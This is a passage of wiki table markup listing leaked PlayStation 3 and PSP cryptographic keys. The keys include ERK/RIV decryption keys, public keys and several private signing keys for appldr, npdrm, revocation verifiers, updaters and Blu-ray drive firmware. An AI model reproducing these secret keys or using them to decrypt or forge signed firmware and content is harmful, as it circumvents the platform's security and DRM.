&lt;code&gt;0x31&lt;/code&gt;<br /> |-<br /> | rvklist || 4.00-4.11 || &lt;code&gt;99E8959A4363BE9EBDBC2B9C73BCBBE627BF112883E650E3F95879C0BFFB103E&lt;/code&gt; || &lt;code&gt;182CC801794A2F7027BB76D29D598550&lt;/code&gt; || &lt;code&gt;6319A4B7D99FD3A3332CB13F3DE44A898B6A4CF04B9C15E6166AFC7C5272AF7A4DE04E802FD2C71C&lt;/code&gt; || - || &lt;code&gt;0x02&lt;/code&gt;<br /> |-<br /> | rvklist || 4.20-{{latest}} || &lt;code&gt;695984b7ee2ec2f77fcc3120150dce7e4480d84480ddd8c5940aeb6f79e63d17&lt;/code&gt; || &lt;code&gt;a8ba3e4e63b2bb06fc0ce57e3bb8fc46&lt;/code&gt; || &lt;code&gt;7f1950c6e497e922400586ee338b41e01c906c5a6dfd75feb5249cfa4bec534f5ca679670a452b2a&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Spu Pkg Rvk Verifier===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | spu_pkg_rvk_verifier&lt;br /&gt;(Internal) || - {{SD}} || &lt;code&gt;FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF&lt;/code&gt; || &lt;code&gt;0123456789ABCDEFFEDCBA9876543210&lt;/code&gt; || &lt;code&gt;123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037F1482EA7EC578872&lt;/code&gt; || &lt;code&gt;000000000000000000000000000000000001000000&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | spu_pkg_rvk_verifier || 0.80-3.55 (pkg) || &lt;code&gt;A97818BD193A67A16FE83A855E1BE9FB5640938D4DBCB2CB52C5A2F8B02B1031&lt;/code&gt; || &lt;code&gt;4ACEF01224FBEEDF8245F8FF10211E6E&lt;/code&gt; || &lt;code&gt;41DA1A8F74FF8D3F1CE20EF3E9D8865C96014FE373CA143C9BADEDF2D9D3C7573307115CCFE04F13 &lt;/code&gt; || &lt;code&gt;00542D46E7B3DAAC8AEB81E533873AABD6D74BB710 &lt;/code&gt; || &lt;code&gt;0x23&lt;/code&gt;<br /> |-<br /> | spu_pkg_rvk_verifier || 3.56-{{latest}} (spkg) || &lt;code&gt;F8F99006F1C007D5D0B1909E9566E0E70B569399FC3394A811809FDB5CAE92CD&lt;/code&gt; || &lt;code&gt;59D28DB4ADDFB40B7D768BC9667C67B1&lt;/code&gt; || &lt;code&gt;5432BDDD1F97418147AFF016EAA6100834F2CAA8C498B88965689EE44DF349B066CD43CBF4F2C5D0&lt;/code&gt; || - || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===Updater (CEB units Ebootroms)=== <br /> Although these keysets are using 256 bits ERK, the algorithm used for the decryption is AES128CTR therefore only the first 16bytes of the ERK are used (ERK are truncated)<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Version !! ERK !! RIV<br /> |-<br /> | updater || E/rXXX || &lt;code&gt;D9580C4D6349692159CDDFC33F53908B99817C618D61549DDDEA247E57788920&lt;/code&gt; || &lt;code&gt;CB445249CE6A9FEB01DF02C7B94938E1&lt;/code&gt;<br /> |-<br /> | individual_info || E/rXXX || &lt;code&gt;987C95CC38C286D0E36252B867BCEBA1D0BE92DE84F83A26DE1E670683066243&lt;/code&gt; || &lt;code&gt;1AAEBF3ED6EB1B295DAC75963DB37651&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> ===toolupdatedec (Communication Processor Updater binary)===<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Module !! Target !! Filename !! ERK !! RIV<br /> |-<br /> | toolupdatedec || TCP510/TCP520 || reftool_cp_xxx.bin || &lt;code&gt;E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F&lt;/code&gt; || &lt;code&gt;File dependant (the first 16 bytes of the file)&lt;/code&gt;<br /> |-<br /> | toolupdatedec || DTP-T1000 || psptoolupdate.bin || &lt;code&gt;A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB&lt;/code&gt; || &lt;code&gt;File dependant (the first 16 bytes of the file)&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> === PS3 Suffix for NIDS ===<br /> &lt;pre&gt;<br /> 6759659904250490566427499489741A<br /> &lt;/pre&gt;<br /> <br /> === Bluray Drive Keys (retrieved from bluray drive firmware) ===<br /> <br /> 5BCE24712335AF70E570F6559A29F34DE7BBC42D97DE7554CE0264E41CA3171F<br /> 97EC3F4F8751F22B7FFCACA83803EAF7<br /> <br /> or<br /> <br /> E7BBC42D97DE7554CE0264E41CA3171F97EC3F4F8751F22B7FFCACA83803EAF7<br /> 5BCE24712335AF70E570F6559A29F34D<br /> <br /> * Bluray drive firmware uses same curve as KIRK 0xc 0xd 0x10 and 0x11 services.&lt;br /&gt;<br /> * Signature is at the bottom of the firmware. (0x7fd0) &lt;br /&gt;<br /> * it's highly likely to be cbc 256 aes<br /> <br /> XOR stream for descramble some encrypted areas inside bluray eeprom: http://pastebin.com/71Jx1hnE<br /> <br /> It can be used to decrypt emboot and another perdevice areas.<br /> <br /> === EID0 Section Keys ===<br /> <br /> Public key00: &lt;code&gt;94D100BE6E24991D65D93F3DA938858CEC2D133051F47DB4287AC86631719B31573EF7CCE071CA8A&lt;/code&gt;&lt;br /&gt;<br /> Curve00 sha1: &lt;code&gt;9035B33F58DFAEF389FD49187F93C4FC2D2DD268&lt;/code&gt; <br /> &lt;br&gt;Curve:<br /> &lt;pre&gt;<br /> A34D0C98B2A8DEA81E7C3FF0757C5B89<br /> 1B8523E1A34D0C98B2A8DEA81E7C3FF0<br /> 757C5B891B8523DE929F2B86E0F6525F<br /> FDC819D76D5F139A2F8A49B300A34D0C<br /> 98B2A8DEA81E7CEC7E21A8FF20DC9B8F<br /> AF755FD420216829E389548D397246E6<br /> 6DF2EC4B7C9B308B62B9CEFFA3F0071A<br /> 5C396F67FCE4A3A683<br /> &lt;/pre&gt;<br /> [https://twitter.com/naehrwert/status/286745714434899968 twitter]&lt;br /&gt;<br /> <br /> Public key06: &lt;code&gt;06485FD029853B552F7EFDD67A2DE7A1A4E25537B2459D8786426D5B27EFA5A9311CB8ABABFA0ECE&lt;/code&gt;&lt;br /&gt;<br /> Curve type06: 2 (vsh)&lt;br /&gt;<br /> <br /> Public key0A: &lt;code&gt;4F0A2BC9987640860E22EE5D86087C9692470BDF59DC4C1F2E38F92CE7B66875B59ED10C9D84FA6A&lt;/code&gt;&lt;br /&gt;<br /> Curve type0A: 2 (vsh)&lt;br /&gt;<br /> <br /> === PSP ID-Storage Keys ===<br /> '''IDPS'''&lt;br /&gt;<br /> Public key00: &lt;code&gt;4004C80BD9C8BA38221065923E324B5F0EC165ED6CFF7D9F2C420B84DFDA6E96C0AEE29927BCAF1E&lt;/code&gt;&lt;br /&gt;<br /> Curve type00: 2 (vsh)&lt;br /&gt;<br /> Public key01: &lt;code&gt;06485FD029853B552F7EFDD67A2DE7A1A4E25537B2459D8786426D5B27EFA5A9311CB8ABABFA0ECE&lt;/code&gt; &lt;-Same as EID0 Public key06&lt;br /&gt;<br /> Curve type01: 2 (vsh)&lt;br /&gt;<br /> Public key02: &lt;code&gt;3F8C34F210AEC48E1520FF2A44899E054A0DA33DF8B9754B09C0EC7E61867A5126FE6926972196F5&lt;/code&gt;&lt;br /&gt;<br /> Curve type02: 2 (vsh)&lt;br /&gt;<br /> Public key03: &lt;code&gt;CCB3440DC4836DD519E13B2805B30870DCAEE462136B3888651A98E02B29FA0CD34F1616F1ED5786&lt;/code&gt;&lt;br /&gt;<br /> Curve type03: 2 (vsh)&lt;br /&gt;<br /> Public key04: &lt;code&gt;08B336925C2B445D03A9BE51B9AABF54E4CC142EA72A23BB8060B03B71CDE0772DE82AD8931648D6&lt;/code&gt;&lt;br /&gt;<br /> Curve type04: 2 (vsh)&lt;br /&gt;&lt;br /&gt;<br /> '''UMD'''&lt;br /&gt;<br /> Public key: &lt;code&gt;4F0A2BC9987640860E22EE5D86087C9692470BDF59DC4C1F2E38F92CE7B66875B59ED10C9D84FA6A&lt;/code&gt; &lt;-Same as EID0 Public key0A&lt;br /&gt;<br /> Curve type: 2 (vsh)&lt;br /&gt;<br /> <br /> === Appldr ===<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! selftype !! version !! revision !! fw !! type !! ERK !! RIV !! PUBLIC !! PRIVATE !! CURVE_TYPE<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app Internal {{SD}} || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80-0.92 || 0x00 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;014485445EC9926C50F613AE77D9C37AA99838CCEB6F75FA78E29A8C622E8011&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;A17D6A522CB1B08F97DA8A82E97C12F7&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;72C1034FC8E4C1707B7147B9E930FA3F28EBFE070B5EBFBAE4A666B498050929815CF727C6264573 &lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;008732ACD0889FF7480C5C7D9A5D3BF43C46F220F8&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80-0.92 || 0x00 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.80++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;95F50019E7A68E341FA72EFDF4D60ED376E25CF46BB48DFDD1F080259DC93F04&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;4A0955D946DB70D691A640BB7FAECC4C&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;6F8DF8EBD0A1D1DB08B30DD3A951E3F1F27E34030B42C729C55555232D61B834B8BDFFB07E54B343 &lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;006C3E4CCB2C69A5AD7C6F60448E50C7F9184EEAF4&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x21&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.92[[Talk:Keys#2.36_vs_3.30_appldr_key_79481839C4...|-2.36]]&lt;strike&gt;/3.31&lt;/strike&gt; || 0x01 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 0.92++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;79481839C406A632BDB4AC093D73D99AE1587F24CE7E69192C1CD0010274A8AB&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;6F0F25E1C8C4B7AE70DF968B04521DDA&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;94D1B7378BAFF5DFED269240A7A364ED68446741622E50BC6079B6E606A2F8E0A4C56E5CFF836526&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;003DE80167D2F0E9D30F2145144A558D1174F5410C&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;?-2.36&lt;/span&gt; || 0x02 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;1.00++&lt;/span&gt; || dec || &lt;code&gt;4F89BE98DDD43CAD343F5BA6B1A133B0A971566F770484AAC20B5DD1DC9FA06A&lt;/code&gt; || &lt;code&gt;90C127A9B43BA9D8E89FE6529E25206F&lt;/code&gt; || &lt;code&gt;8CA6905F46148D7D8D84D2AFCEAE61B41E6750FC22EA435DFA61FCE6F4F860EE4F54D9196CA5290E&lt;/code&gt; || &lt;code&gt;00530446451C568968EBF7068B1F45C252D70EC942&lt;/code&gt; || &lt;code&gt;0x13&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;seven&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;?-2.36&lt;/span&gt; || 0x00 ? || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;0.85&amp;nbsp;&amp;lt;=3.30&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;D91166973979EA8694476B011AC62C7E9F37DA26DE1E5C2EE3D66E42B8517085&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt; &lt;code&gt;DC01280A6E46BC674B81A7E8801EBE6E&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;A0FC44108236141BF3517A662B027AFC1AC513A05690496C754DEB7D43BDC41B80FD75C212624EE4&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt; &lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x11&lt;/code&gt;&lt;!--// is not in 3.56 FIX //--&gt;<br /> |-<br /> | npdrm || ?-2.36 || 0x00 np || 1.00++ || dec || &lt;code&gt;8E737230C80E66AD0162EDDD32F1F774EE5E4E187449F19079437A508FCF9C86&lt;/code&gt; || &lt;code&gt;7AAECC60AD12AED90C348D8C11D2BED5&lt;/code&gt; || &lt;code&gt;05BF09CB6FD78050C78DE69CC316FF27C9F1ED66A45BFCE0A1E5A6749B19BD546BBB4602CF373440&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x0A&lt;/code&gt;<br /> |-<br /> | npdrm || 0.92-2.36 || 0x01 np || 1.00++ || dec || &lt;code&gt;F9EDD0301F770FABBA8863D9897F0FEA6551B09431F61312654E28F43533EA6B&lt;/code&gt; || &lt;code&gt;A551CCB4A42C37A734A2B4F9657D5540&lt;/code&gt; || &lt;code&gt;B05F9DA5F9121EE4031467E74C505C29A8E29D1022379EDFF0500B9AE480B5DAB4578A4C61C5D6BF&lt;/code&gt; || &lt;code&gt;00040AB47509BED04BD96521AD1B365B86BF620A98&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;2.40-3.30&lt;/span&gt; || 0x03 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;2.40++&lt;/span&gt; || dec || &lt;code&gt;C1E6A351FCED6A0636BFCB6801A0942DB7C28BDFC5E0A053A3F52F52FCE9754E&lt;/code&gt; || &lt;code&gt;E0908163F457576440466ACAA443AE7C&lt;/code&gt; || &lt;code&gt;50022D5D37C97905F898E78E7AA14A0B5CAAD5CE8190AE5629A10D6F0CF4173597B37A95A7545C92&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x0B&lt;/code&gt;<br /> |-<br /> | npdrm || 2.40-3.30 || 0x03 np || 2.40++ || dec || &lt;code&gt;1B715B0C3E8DC4C1A5772EBA9C5D34F7CCFE5B82025D453F3167566497239664&lt;/code&gt; || &lt;code&gt;E31E206FBB8AEA27FAB0D9A2FFB6B62F&lt;/code&gt; || &lt;code&gt;3F51E59FC74D6618D34431FA67987FA11ABBFACC7111811473CD9988FE91C43FC74605E7B8CB732D&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.40-3.42 || 0x04 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.40++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;838F5860CF97CDAD75B399CA44F4C214CDF951AC795298D71DF3C3B7E93AAEDA&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;7FDBB2E924D182BB0D69844ADC4ECA5B&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;1F140E8EF887DAB52F079A06E6915A6460B75CD256834A43FA7AF90C23067AF412EDAFE2C1778D69&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0074E922FDEE5DC4CDF22FC8D7986477F813400860&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x14&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x05 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40++&lt;/span&gt; || dec || &lt;code&gt;C109AB56593DE5BE8BA190578E7D8109346E86A11088B42C727E2B793FD64BDC&lt;/code&gt; || &lt;code&gt;15D3F191295C94B09B71EBDE088A187A&lt;/code&gt; || &lt;code&gt;B6BB0A84C649A90D97EBA55B555366F52381BB38A84C8BB71DA5A5A0949043C6DB249029A43156F7&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x06 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.40++&lt;/span&gt; || dec || &lt;code&gt;6DFD7AFB470D2B2C955AB22264B1FF3C67F180983B26C01615DE9F2ECCBE7F41&lt;/code&gt; || &lt;code&gt;24BD1C19D2A8286B8ACE39E4A37801C2&lt;/code&gt; || &lt;code&gt;71F46AC33FF89DF589A100A7FB64CEAC244C9A0CBBC1FDCE80FB4BF8A0D2E66293309CB8EE8CFA95&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2C&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.40-3.42&lt;/span&gt; || 0x05 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.40&amp;nbsp;&amp;lt;=3.42&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;B73111B0B00117E48DE5E2EE5E534C0F0EFFA4890BBB8CAD01EE0F848F91583E&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;86F56F9E5DE513894874B8BA253334B1&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;B0BA1A1AB9723BB4E87CED9637BE056066BC56E16572D43D0210A06411DBF8FEB8885CD912384AE5&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x12&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.40-3.42 || 0x04 np || 3.40++ || dec || &lt;code&gt;BB4DBF66B744A33934172D9F8379A7A5EA74CB0F559BB95D0E7AECE91702B706&lt;/code&gt; || &lt;code&gt;ADF7B207A15AC601110E61DDFC210AF6&lt;/code&gt; || &lt;code&gt;9C327471BAFF1F877AE4FE29F4501AF5AD6A2C459F8622697F583EFCA2CA30ABB5CD45D1131CAB30&lt;/code&gt; || &lt;code&gt;00B61A91DF4AB6A9F142C326BA9592B5265DA88856&lt;/code&gt; || &lt;code&gt;0x16&lt;/code&gt;<br /> |-<br /> | npdrm || 3.40-3.42 || 0x06 np || 3.40++ || dec || &lt;code&gt;8B4C52849765D2B5FA3D5628AFB17644D52B9FFEE235B4C0DB72A62867EAA020&lt;/code&gt; || &lt;code&gt;05719DF1B1D0306C03910ADDCE4AF887&lt;/code&gt; || &lt;code&gt;2A5D6C6908CA98FC4740D834C6400E6D6AD74CF0A712CF1E7DAE806E98605CC308F6A03658F2970E&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x29&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.50 || 0x07 || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.50++ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;945B99C0E69CAF0558C588B95FF41B232660ECB017741F3218C12F9DFDEEDE55&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;1D5EFBE7C5D34AD60F9FBC46A5977FCE&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;AB284CA549B2DE9AA5C903B75652F78D192F8F4A8F3CD99209415C0A84C5C9FD6BF3095C1C18FFCD&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;002CF896D35DB871D0E6A252E799876A70D043C23E&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50&lt;/span&gt; || 0x08 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50++&lt;/span&gt; || dec || &lt;code&gt;2C9E8969EC44DFB6A8771DC7F7FDFBCCAF329EC3EC070900CABB23742A9A6E13&lt;/code&gt; || &lt;code&gt;5A4CEFD5A9C3C093D0B9352376D19405&lt;/code&gt; || &lt;code&gt;6E82F6B54A0E9DEBE4A8B3043EE3B24CD9BBB62B4416B0482582E419A2552E29AB4BEA0A4D7FA2D5&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x16&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50&lt;/span&gt; || 0x09 || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.50++&lt;/span&gt; || dec || &lt;code&gt;F69E4A2934F114D89F386CE766388366CDD210F1D8913E3B973257F1201D632B&lt;/code&gt; || &lt;code&gt;F4D535069301EE888CC2A852DB654461&lt;/code&gt; || &lt;code&gt;1D7B974D10E61C2ED087A0981535904677EC07E96260F89565FF7EBDA4EE035C2AA9BCBDD5893F99&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2D&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.50&lt;/span&gt; || 0x08 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.50 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;8E944267C02E69A4FE474B7F5FCD7974A4F936FF4355AEC4F80EFA123858D8F6&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;908A75754E521EAC2F5A4889C6D7B72D&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;91201DA7D79E8EE2563142ECBD646DA026C963AC09E760E5390FFE24DAE6864310ABE147F8204D0B&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x13&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.50 || 0x07 np || 3.50++ || dec || &lt;code&gt;3946DFAA141718C7BE339A0D6C26301C76B568AEBC5CD52652F2E2E0297437C3&lt;/code&gt; || &lt;code&gt;E4897BE553AE025CDCBF2B15D1C9234E&lt;/code&gt; || &lt;code&gt;A13AFE8B63F897DA2D3DC3987B39389DC10BAD99DFB703838C4A0BC4E8BB44659C726CFD0CE60D0E&lt;/code&gt; || &lt;code&gt;009EF86907782A318D4CC3617EBACE2480E73A46F6&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | npdrm || 3.50 || 0x09 np || 3.50++ || dec || &lt;code&gt;0786F4B0CA5937F515BDCE188F569B2EF3109A4DA0780A7AA07BD89C3350810A&lt;/code&gt; || &lt;code&gt;04AD3C2F122A3B35E804850CAD142C6D&lt;/code&gt; || &lt;code&gt;A1FE61035DBBEA5A94D120D03C000D3B2F084B9F4AFA99A2D4A588DF92B8F36327CE9E47889A45D0&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x2A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#ACFCAC; color:#330033;&quot; | app || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.55 || 0x0A || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | 3.55+ || dec || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;29805302E7C92F204009161CA93F776A072141A8C46A108E571C46D473A176A3&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;5D1FAB844107676ABCDFC25EAEBCB633&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;09301B6436C85B53CB1585300A3F1AF9FB14DB7C30088C4642AD66D5C148B8995BB1A698A8C71827&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0010818ED8A666051C6198662C3D6DDE2CA4901DDC&lt;/code&gt; || style=&quot;background-color:#ACFCAC; color:#330033;&quot; | &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; 